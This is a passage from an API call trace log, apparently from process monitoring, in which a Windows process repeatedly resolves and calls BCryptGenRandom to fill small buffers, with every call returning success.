dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0236f, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a0236f) returned 0x0 [0264.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0238c, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a0238c) returned 0x0 [0264.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023a1, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a023a1) returned 0x0 [0264.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023c9, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a023c9) returned 0x0 [0264.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 